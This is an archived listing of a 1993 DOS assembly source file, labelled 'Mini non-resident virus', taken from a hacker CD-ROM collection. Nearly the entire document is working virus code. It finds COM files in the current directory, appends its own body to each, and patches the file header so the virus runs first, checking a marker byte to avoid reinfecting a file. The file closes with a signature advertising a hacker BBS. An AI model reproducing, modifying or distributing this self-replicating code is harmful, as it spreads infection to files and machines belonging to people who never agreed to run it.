home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tdupdat2.err / MASUDKHA.ZIP / MINI111.ZIP / MINI111.ASM next >
Encoding:
Assembly Source File  |  1993-12-24  |  3.5 KB  |  114 lines
  1. ;****************************************************************************
  2. ;*              Mini non-resident virus
  3. ;****************************************************************************
  4.  
  5. cseg            segment
  6.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  7.  
  8.                 .RADIX  16
  9.  
  10. FILELEN         equ     eind - start
  11. FILNAM          equ     69
  12.  
  13.  
  14. ;****************************************************************************
  15. ;*              Dummy program (infected)
  16. ;****************************************************************************
  17.  
  18.                 org     100h
  19.  
  20. begin:          db      4Dh
  21.                 db      0E9, 4, 0
  22.  
  23.  
  24. ;****************************************************************************
  25. ;*              Begin of the virus
  26. ;****************************************************************************
  27.  
  28.  
  29. start:          db      0CDh,  20h, 0, 0
  30.  
  31.                 push    si                      ;si=0100
  32.  
  33.                 mov     di,si
  34.                 add     si,[si+2]               ;si=0104
  35.                 push    si
  36.                 movsw
  37.                 movsw
  38.                 pop     si                      ;si -> start (buffer)
  39.  
  40.                 mov     dh,0FF                  ;set DTA to FF80
  41.                 call    setDTA
  42.  
  43.                 lea     dx,[si+FILNAM]          ;dx -> filename
  44.                 mov     ah,4Eh                  ;find first file
  45. infloop:        int     21
  46.                 cwd                             ;set DTA to 0080 and quit
  47.                 jc      setDTA
  48.  
  49.                 mov     dx,0FF9Eh
  50.                 mov     ax,3D02h                ;open the file
  51.                 call    int21
  52.                 jc      exit1
  53.                 xchg    bx,ax
  54.  
  55.                 mov     ah,3fh                  ;read begin of file
  56.                 int     21
  57.  
  58.                 cmp     byte ptr [si],4Dh       ;EXE or infected COM?
  59.                 je      exit2
  60.  
  61.                 mov     al,2                    ;go to end of file
  62.                 call    seek
  63.                 xchg    ax,di
  64.  
  65.                 mov     cl,FILELEN              ;write program to end of file
  66.                 mov     ah,40h
  67.                 int     21
  68.  
  69.                 mov     al,0
  70.                 call    seek
  71.                 mov     word ptr [si],0E94Dh
  72.                 mov     word ptr [si+2],di
  73.  
  74.  
  75.                 mov     ah,40h
  76.                 int     21
  77.  
  78. exit2:          mov     ah,3Eh                  ;close the file
  79.                 int     21
  80.  
  81. exit1:          mov     ah,4Fh                  ;find next file
  82.                 jmp     short infloop
  83.  
  84. setDTA:         mov     dl,80
  85.                 mov     ah,1A
  86.                 int     21
  87.                 ret
  88.  
  89. seek:           mov     ah,42
  90.                 cwd
  91. int21:          xor     cx,cx
  92.                 int     21
  93.                 mov     cl,04
  94.                 mov     dx,si
  95.  
  96. return:         ret
  97.  
  98.  
  99. ;****************************************************************************
  100. ;*              Data
  101. ;****************************************************************************
  102.  
  103. filename        db      '*.COM',0
  104.  
  105. eind:
  106.  
  107. cseg            ends
  108.                 end     begin
  109. 
  110. ;  ─────────────────────────────────────────────────────────────────────────
  111. ;  ───────────────> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <───────────────
  112. ;  ───────────> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <───────────
  113. ;  ─────────────────────────────────────────────────────────────────────────
  114.